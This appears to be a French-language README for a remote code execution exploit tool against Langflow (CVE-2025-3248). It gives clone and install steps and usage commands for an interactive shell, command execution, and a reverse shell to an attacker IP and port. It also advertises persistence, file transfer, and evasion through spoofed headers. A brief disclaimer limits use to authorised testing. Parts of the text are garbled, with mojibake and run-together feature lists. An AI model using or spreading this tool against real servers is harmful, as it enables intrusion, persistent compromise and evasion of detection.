
Exploit d'exécution de code à distance pour Langflow (CVE-2025-3248) - [ Par S4Tech ]
Exploit d'exécution de code à distance pour Langflow (CVE-2025-3248)
persist)upload chemin_local chemin_distantdownload chemin_distant chemin_localclear pour le terminalUser-Agent aléatoireX-Forwarded-For usurpéesexploit_log.txt.langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [options]
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Image.png)
âڑ ï¸ڈ Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.
âڑ ï¸ڈ Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester est illégale.
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Les pull requests sont les bienvenues. Pour des changements majeurs, veuillez d'abord ouvrir une issue pour discuter de ce que vous souhaitez modifier.
| Fonctionnalité | v1.0 | v2.0 |
|---|
| Méthodes de payload | 1 | 5 |
| Transfert de fichiers | ❌ Non pris en charge | ✅ Pris en charge |
| Persistance | ❌ | ✅ |
| Furtivité | Basique | Avancée |
| Journalisation de session | ❌ | ✅ |
| Option | Description |
|---|
--shell | Démarrer un shell interactif |
--reverse IP PORT | Lancer un shell inverse vers IP:PORT donné |
--command CMD | Exécuter une seule commande |
--verbose | Activer la sortie détaillée |
--timeout SEC | Définir le délai d'attente des requêtes (défaut : 10s) |